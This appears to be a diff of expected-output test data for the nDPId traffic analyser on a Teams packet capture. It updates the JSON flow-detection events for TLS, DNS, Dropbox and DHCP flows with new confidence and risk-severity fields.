 00364{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":607,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041677408,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
 00167{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":607,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969}
@@ -63,29 +63,29 @@
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1587041678029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041678029,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex5Abv0H+uOAAAAALAC\/\/9XkAAAAgQFtAEDAwUBAQgKMISdwwAAAAAEAgAA"}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":619,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1587041678074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1587041678074,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8KlZAAGwGoSQ0ck0hwKgBBgG77Hk7ZXhQ9B\/rj6ASIAAz8QAAAgQFoAEDAwgEAggKYRL\/2zCEncM="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1587041678074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041678074,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex5Abv0H+uPO2V4UYAQEAlydQAAAQEICjCEne9hEv\/b"}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041678029,"flow_last_seen":1587041678074,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1587041678074,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01387{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":625,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041678029,"flow_last_seen":1587041678120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"ts_msec":1587041678120,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}}
+00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041678029,"flow_last_seen":1587041678074,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1587041678074,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01493{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":625,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041678029,"flow_last_seen":1587041678120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"ts_msec":1587041678120,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}}
 00353{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":644,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041678611,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
 00164{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":644,"source":"teams.pcap","alias":"nDPId-test","layer_type":38}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679059,"flow_last_seen":1587041679059,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1587041679059,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1587041679059,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"ts_msec":1587041679059,"pkt":"EBMx8Tl2KDc3AG3ICABFAABFmxQAAP8RnTvAqAEGwKgBAfouADUAMTs\/p0sBAAABAAAAAAAAAWIHX2Rucy1zZARfdWRwBG50b3ADb3JnAAAMAAE="}
-00739{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679059,"flow_last_seen":1587041679059,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1587041679059,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679059,"flow_last_seen":1587041679059,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1587041679059,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":646,"source":"teams.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1587041679280,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01089{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"teams.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1587041679280,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":527,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":527,"pkt_l4_len":493,"ts_msec":1587041679280,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAAIBKZoAAEARjaTAqAEG\/\/\/\/\/0RcRFwB7XmveyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAxMzMzNTg3NDkxMjE4NDQ1MzM1NDE0MzUyMjUyODU2OTU0NjIxMiwgImRpc3BsYXluYW1lIjogIiIsICJuYW1lc3BhY2VzIjogWzI3NTAzNzA1NjAsIDc4NTI2NjE3NywgMTUyNjI2MzA0NSwgMjg1MjE2MDcsIDE0ODE5MzM3LCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCA0MDU2NDYyNTkyLCA3MDUzNjI3MTg0LCAxNTIyMTc3NTg3LCAxNDIxMTE0Mzk5LCAxMjUyMTE2NDI5LCA5OTQ2OTc3MywgNzA3OTYzNjY4OCwgMTc2OTY0MzA3LCAxMjU1NDA1NjYsIDEwNDc0MjgxODksIDQ3MTYxOTAwNDgsIDU0NjcxNjMwODgsIDExOTUwNDQwNzEsIDk2ODUzMjI0LCAxNzYwOTk2MywgNjQ3ODMwMzQ0MCwgNTExNzA2NjQyLCA2Mjk3OTU1MTg0LCAxNDE1NjIwMzUwXX0="}
-00613{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"teams.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1587041679280,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"teams.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1587041679280,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":647,"source":"teams.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1587041679280,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01085{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"teams.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1587041679280,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":527,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":527,"pkt_l4_len":493,"ts_msec":1587041679280,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAAIBMegAAEARwq7AqAEGwKgB\/0RcRFwB7bcHeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAxMzMzNTg3NDkxMjE4NDQ1MzM1NDE0MzUyMjUyODU2OTU0NjIxMiwgImRpc3BsYXluYW1lIjogIiIsICJuYW1lc3BhY2VzIjogWzI3NTAzNzA1NjAsIDc4NTI2NjE3NywgMTUyNjI2MzA0NSwgMjg1MjE2MDcsIDE0ODE5MzM3LCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCA0MDU2NDYyNTkyLCA3MDUzNjI3MTg0LCAxNTIyMTc3NTg3LCAxNDIxMTE0Mzk5LCAxMjUyMTE2NDI5LCA5OTQ2OTc3MywgNzA3OTYzNjY4OCwgMTc2OTY0MzA3LCAxMjU1NDA1NjYsIDEwNDc0MjgxODksIDQ3MTYxOTAwNDgsIDU0NjcxNjMwODgsIDExOTUwNDQwNzEsIDk2ODUzMjI0LCAxNzYwOTk2MywgNjQ3ODMwMzQ0MCwgNTExNzA2NjQyLCA2Mjk3OTU1MTg0LCAxNDE1NjIwMzUwXX0="}
-00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"teams.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1587041679280,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"teams.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1587041679280,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00364{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":648,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041679406,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
 00167{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":648,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969}
 00353{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":649,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041679611,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
 00164{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":649,"source":"teams.pcap","alias":"nDPId-test","layer_type":38}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1587041680062,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"ts_msec":1587041680062,"pkt":"EBMx8Tl2KDc3AG3ICABFAABFhq8AAP8RsaDAqAEGwKgBAfouADUAMTs\/p0sBAAABAAAAAAAAAWIHX2Rucy1zZARfdWRwBG50b3ADb3JnAAAMAAE="}
 00557{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1587041680074,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":136,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":136,"pkt_l4_len":102,"ts_msec":1587041680074,"pkt":"KDc3AG3IEBMx8Tl2CABFAAB61LQAAEARImfAqAEBwKgBBgA1+i4AZgAAp0uBgwABAAAAAQAAAWIHX2Rucy1zZARfdWRwBG50b3ADb3JnAAAMAAHAGwAGAAEAAAA7ACkFZG5zZG\/AGwpwb3N0bWFzdGVywBt4ZvNkAACowAAAHCAAJOoAAAACWA=="}
-00748{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":651,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1587041679059,"flow_last_seen":1587041680074,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1587041680074,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":1,"num_answers":1,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00774{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":651,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1587041679059,"flow_last_seen":1587041680074,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1587041680074,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":1,"num_answers":1,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":664,"source":"teams.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041680216,"flow_last_seen":1587041680216,"flow_idle_time":180000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"ts_msec":1587041680216,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00920{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"teams.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1587041680216,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":397,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":397,"pkt_l4_len":363,"ts_msec":1587041680216,"pkt":"\/\/\/\/\/\/\/\/AICPmq69CABFAAF\/44MAAEARlesAAAAA\/\/\/\/\/wBEAEMBa5dnAQEGABWCmMYYtQAAAAAAAAAAAAAAAAAAAAAAAACAj5quvQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBPRP\/j5quvQABAAEfyzfOuCfrPQjbUAB0AQE5AgXcPC1kaGNwY2QtNi4xMC4xOkxpbnV4LTQuOS41Ny12Nys6YXJtdjdsOkJDTTI4MzUMDHBpMy5udG9wLm9yZ5EBATcPAXkhAwYMDxocKjM2Ojt3\/w=="}
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":664,"source":"teams.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041680216,"flow_last_seen":1587041680216,"flow_idle_time":180000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"ts_msec":1587041680216,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}}
+00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":664,"source":"teams.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041680216,"flow_last_seen":1587041680216,"flow_idle_time":180000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"ts_msec":1587041680216,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":665,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041680294,"flow_last_seen":1587041680294,"flow_idle_time":7440000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":1,"ts_msec":1587041680294,"l3_proto":"ip4","src_ip":"93.62.150.157","dst_ip":"192.168.1.6","src_port":443,"dst_port":60512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1587041680294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"ts_msec":1587041680294,"pkt":"KDc3AG3IEBMx8Tl2CABFAABYCTNAAHEGSuNdPpadwKgBBgG77GBJd2ZkkI5L3oAY\/\/uUpgAAAQEICsJ1bW4wg\/kbFwMDAB8AAAAAAAAABVYf48xkHJTZ\/YMO7dmv4tC6Gofi60hR"}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1587041680294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1587041680294,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGhUbAqAEGXT6WnexgAbuQjkveAAAAAFAEAAAvzgAA"}
@@ -94,79 +94,79 @@
 00164{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":669,"source":"teams.pcap","alias":"nDPId-test","layer_type":38}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":850,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681218,"flow_last_seen":1587041681218,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1587041681218,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
